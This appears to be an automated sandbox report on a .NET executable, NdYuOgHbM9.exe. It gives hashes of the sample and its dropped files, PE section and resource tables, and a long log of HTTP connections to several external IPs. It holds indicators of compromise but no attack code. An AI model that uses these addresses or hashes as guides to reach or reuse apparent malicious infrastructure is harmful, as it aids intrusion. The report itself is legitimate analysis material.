                                                                                                                    SHA-512:6FC13DF5EC3C122F66E33279C451A6DE8DF5841063D940A4DF44D6FF96832ACD82899E5359350073EF7D60AACB0112201E35D6E925A3D2EDDD2C15CD3F921AA7
                                                                                                                    Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>2060</Pi
                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4759
                                                                                                                    Entropy (8bit):4.524400457115686
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zs0Jg771I9JGWpW8VY1Ym8M4JT0AFjyq85rkh6lzk6ed:uIjfyI7iH7VJJTDFh6lI6ed
                                                                                                                    MD5:DCF33ED1FB37D7C3C80464CDF45C3DD7
                                                                                                                    SHA1:A06844C1E119A50FE9418F2B99315FD20E207747
                                                                                                                    SHA-256:6B48AEC1B256567FF8A79B778A46C7E6A0BB9623D8B6DE0E7AF366016DA382DB
                                                                                                                    SHA-512:57954BC5669A999020D0F3249D512F9259761DF37BCCBCE86D6813D167CAA05EB2BA8D1F4494832C33833ABBB11B1C6001300791102CE5BBE4E26F41BC56FEC8
                                                                                                                    Malicious:false
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="314107" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):64
                                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                    MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                    SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                    SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                    SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\SysWOW64\sfc.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):114688
                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1835008
                                                                                                                    Entropy (8bit):4.4659417617299715
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:4IXfpi67eLPU9skLmb0b4SWSPKaJG8nAgejZMMhA2gX4WABl0uNLdwBCswSb7:tXD94SWlLZMM6YFHN+7
                                                                                                                    MD5:412F59F8014CB528A47814CA70FC7582
                                                                                                                    SHA1:419AEEA61D5FD342DB6BACC8341D0F83B77A42EA
                                                                                                                    SHA-256:3A267D965F0AA98F8FC55E6139F12091CCB3ED6DEEB8EED003066C9531306F81
                                                                                                                    SHA-512:EED8115DD1BA9E2C6B64B511467098ED427D497938E4C3243CA90C3414D5CBD6B12D4A05ECC3F0F42A187A4C6E5AE3637647B1BF73CC1AE852DE1A56C0C4F96C
                                                                                                                    Malicious:false
                                                                                                                    File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                    Entropy (8bit):7.8081007571029755
                                                                                                                    TrID:
                                                                                                                    • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                                                                    • Win64 Executable Console (202006/5) 47.64%
                                                                                                                    • Win64 Executable (generic) (12005/4) 2.83%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.47%
                                                                                                                    • DOS Executable Generic (2002/1) 0.47%
                                                                                                                    File name:NdYuOgHbM9.exe
                                                                                                                    File size:849'277 bytes
                                                                                                                    MD5:664eddacb00d2d58f85cdc2913a1680e
                                                                                                                    SHA1:3dfce1917291ff78513dba84e8ac715700d814d7
                                                                                                                    SHA256:1bb742c209872385c5b456d066fccf141ab2405245953c135b36029a3dbd5bee
                                                                                                                    SHA512:a7c3be40568a5b531b648497be3a4e1abe7408e75a2981575b4858a945c66958af0eb01c4abc4c135f83c120e6f50d6cf148dca1b79b82dc2c9b7185406d4893
                                                                                                                    SSDEEP:12288:Ejwz+S8matk6SosnQq8xMdzq/0P5uxvSpN1HVuX+1Bhkc92Wkdu7n1Gwi:8wCSwk6SotJguxvCN1HVuO1rjFkG18
                                                                                                                    TLSH:E4050122E81D5F9BDD4E00BCC42100C139ADD751F3EAAE6589C6924FEC822D67179DFA
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....f............"...0..`............... ....@...... ....................................`................................
                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                    Entrypoint:0x400000
                                                                                                                    Entrypoint Section:
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows cui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x8ECA66DD [Thu Nov 30 04:34:37 2045 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:
                                                                                                                    Instruction
                                                                                                                    dec ebp
                                                                                                                    pop edx
                                                                                                                    nop
                                                                                                                    add byte ptr [ebx], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax+eax], al
                                                                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3a000 | 0xbe4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x38006 | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x360c7 | 0x36200 | d95f9884977edcba0c93c94f0336aa36 | False | 0.532815206408776 | data | 6.323643777206914 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x3a000 | 0xbe4 | 0xc00 | 85fbcfffbbf927e340e26d2f889aa1f1 | False | 0.2981770833333333 | data | 4.056327325789078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x3a0b8 | 0x4a0 | data | | | 0.47297297297297297
RT_VERSION | 0x3a558 | 0x4a0 | data | English | United States | 0.47550675675675674
RT_MANIFEST | 0x3a9f8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                    May 8, 2024 14:06:39.936537027 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936548948 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936553955 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.936561108 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936573029 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936589956 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.936603069 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936616898 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:39.936640024 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.936737061 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:39.939698935 CEST4975980192.168.2.491.195.240.19
                                                                                                                    May 8, 2024 14:06:40.251949072 CEST804975991.195.240.19192.168.2.4
                                                                                                                    May 8, 2024 14:06:45.201514006 CEST4976080192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:45.401309013 CEST8049760203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:45.401375055 CEST4976080192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:45.403407097 CEST4976080192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:45.603169918 CEST8049760203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:45.613395929 CEST8049760203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:45.613509893 CEST8049760203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:45.613550901 CEST4976080192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:46.916640043 CEST4976080192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:47.938968897 CEST4976180192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:48.136976004 CEST8049761203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:48.137207985 CEST4976180192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:48.138953924 CEST4976180192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:48.335875988 CEST8049761203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:48.345973969 CEST8049761203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:48.346072912 CEST8049761203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:48.348731041 CEST4976180192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:49.647608042 CEST4976180192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:50.676512957 CEST4976280192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:50.875716925 CEST8049762203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:50.878827095 CEST4976280192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:50.878827095 CEST4976280192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:51.077749968 CEST8049762203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:51.077785969 CEST8049762203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:51.077938080 CEST8049762203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:51.078366995 CEST8049762203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:51.089790106 CEST8049762203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:51.089850903 CEST8049762203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:51.096612930 CEST4976280192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:52.382482052 CEST4976280192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:53.401413918 CEST4976380192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:53.598088980 CEST8049763203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:53.598159075 CEST4976380192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:53.601408958 CEST4976380192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:53.797871113 CEST8049763203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:53.811425924 CEST8049763203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:53.811455011 CEST8049763203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:53.811588049 CEST4976380192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:53.813869953 CEST4976380192.168.2.4203.161.46.103
                                                                                                                    May 8, 2024 14:06:54.012408972 CEST8049763203.161.46.103192.168.2.4
                                                                                                                    May 8, 2024 14:06:59.484476089 CEST4976480192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:06:59.789767981 CEST8049764185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:06:59.789848089 CEST4976480192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:06:59.840877056 CEST4976480192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:00.146944046 CEST8049764185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:00.154747009 CEST8049764185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:00.154759884 CEST8049764185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:00.154803038 CEST4976480192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:01.366363049 CEST4976480192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:02.409367085 CEST4976580192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:02.714718103 CEST8049765185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:02.718429089 CEST4976580192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:02.718429089 CEST4976580192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:03.023849964 CEST8049765185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:03.030030012 CEST8049765185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:03.030042887 CEST8049765185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:03.037595034 CEST4976580192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:04.225678921 CEST4976580192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:05.252393961 CEST4976680192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:05.558590889 CEST8049766185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:05.558676958 CEST4976680192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:05.611547947 CEST4976680192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:05.917762041 CEST8049766185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:05.917773962 CEST8049766185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:05.917784929 CEST8049766185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:05.926081896 CEST8049766185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:05.926093102 CEST8049766185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:05.926139116 CEST4976680192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:07.116305113 CEST4976680192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:08.134816885 CEST4976780192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:08.441138983 CEST8049767185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:08.442653894 CEST4976780192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:08.446465015 CEST4976780192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:08.752183914 CEST8049767185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:08.758023024 CEST8049767185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:08.758459091 CEST8049767185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:08.758632898 CEST4976780192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:08.762450933 CEST4976780192.168.2.4185.135.132.99
                                                                                                                    May 8, 2024 14:07:09.068142891 CEST8049767185.135.132.99192.168.2.4
                                                                                                                    May 8, 2024 14:07:14.201478004 CEST4976880192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:14.619573116 CEST804976835.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:14.624444962 CEST4976880192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:14.624445915 CEST4976880192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:15.043603897 CEST804976835.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:15.304558039 CEST804976835.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:15.304573059 CEST804976835.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:15.304585934 CEST804976835.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:15.304598093 CEST804976835.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:15.304611921 CEST804976835.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:15.304625988 CEST804976835.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:15.304636955 CEST804976835.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:15.304639101 CEST4976880192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:15.304668903 CEST4976880192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:15.304691076 CEST4976880192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:16.131967068 CEST4976880192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:17.150719881 CEST4976980192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:17.575256109 CEST804976935.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:17.575342894 CEST4976980192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:17.577522039 CEST4976980192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:18.000745058 CEST804976935.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:18.238111973 CEST804976935.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:18.238125086 CEST804976935.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:18.238138914 CEST804976935.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:18.238151073 CEST804976935.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:18.238164902 CEST804976935.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:18.238172054 CEST4976980192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:18.238177061 CEST804976935.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:18.238187075 CEST804976935.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:18.238219023 CEST4976980192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:18.238219023 CEST4976980192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:18.238249063 CEST4976980192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:19.085108995 CEST4976980192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:20.103013992 CEST4977080192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:20.522083044 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:20.522604942 CEST4977080192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:20.526452065 CEST4977080192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:20.945292950 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:20.945373058 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:20.945462942 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:21.128302097 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:21.128315926 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:21.128326893 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:21.128341913 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:21.128359079 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:21.128370047 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:21.128382921 CEST804977035.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:21.128431082 CEST4977080192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:21.130438089 CEST4977080192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:22.038196087 CEST4977080192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:23.060342073 CEST4977180192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:23.483835936 CEST804977135.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:23.483917952 CEST4977180192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:23.486190081 CEST4977180192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:23.911036968 CEST804977135.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:24.013814926 CEST804977135.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:24.013849020 CEST804977135.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:24.013938904 CEST4977180192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:24.016741991 CEST4977180192.168.2.435.213.232.35
                                                                                                                    May 8, 2024 14:07:24.442190886 CEST804977135.213.232.35192.168.2.4
                                                                                                                    May 8, 2024 14:07:29.551089048 CEST4977280192.168.2.447.76.62.167
                                                                                                                    May 8, 2024 14:07:29.881886005 CEST804977247.76.62.167192.168.2.4
                                                                                                                    May 8, 2024 14:08:20.761228085 CEST804978662.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:20.761241913 CEST4978680192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:20.761271000 CEST4978680192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:21.091331005 CEST804978662.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:21.092540979 CEST4978680192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:21.600770950 CEST4978680192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:22.619159937 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:22.948663950 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:22.948753119 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:22.950635910 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:23.281723022 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:23.281857967 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:23.281960011 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:23.281971931 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:23.281995058 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:23.282062054 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:23.615241051 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:23.615396976 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:23.618288040 CEST4978780192.168.2.462.149.128.40
                                                                                                                    May 8, 2024 14:08:23.947650909 CEST804978762.149.128.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:37.715706110 CEST4978880192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:37.988276005 CEST8049788137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:37.988389969 CEST4978880192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:38.089293003 CEST4978880192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:38.361790895 CEST8049788137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:38.361881018 CEST8049788137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:38.361896038 CEST8049788137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:38.361952066 CEST4978880192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:39.600817919 CEST4978880192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:40.820291042 CEST4978980192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:41.097242117 CEST8049789137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:41.097384930 CEST4978980192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:41.099900007 CEST4978980192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:41.373892069 CEST8049789137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:41.374042034 CEST8049789137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:41.374054909 CEST8049789137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:41.374138117 CEST4978980192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:42.616415977 CEST4978980192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:43.640578985 CEST4979080192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:43.913093090 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:43.913224936 CEST4979080192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:43.915498972 CEST4979080192.168.2.4137.220.252.40
                                                                                                                    May 8, 2024 14:08:44.187721968 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.187735081 CEST8049790137.220.252.40192.168.2.4
                                                                                                                    May 8, 2024 14:08:44.187742949 CEST8049790137.220.252.40192.168.2.4
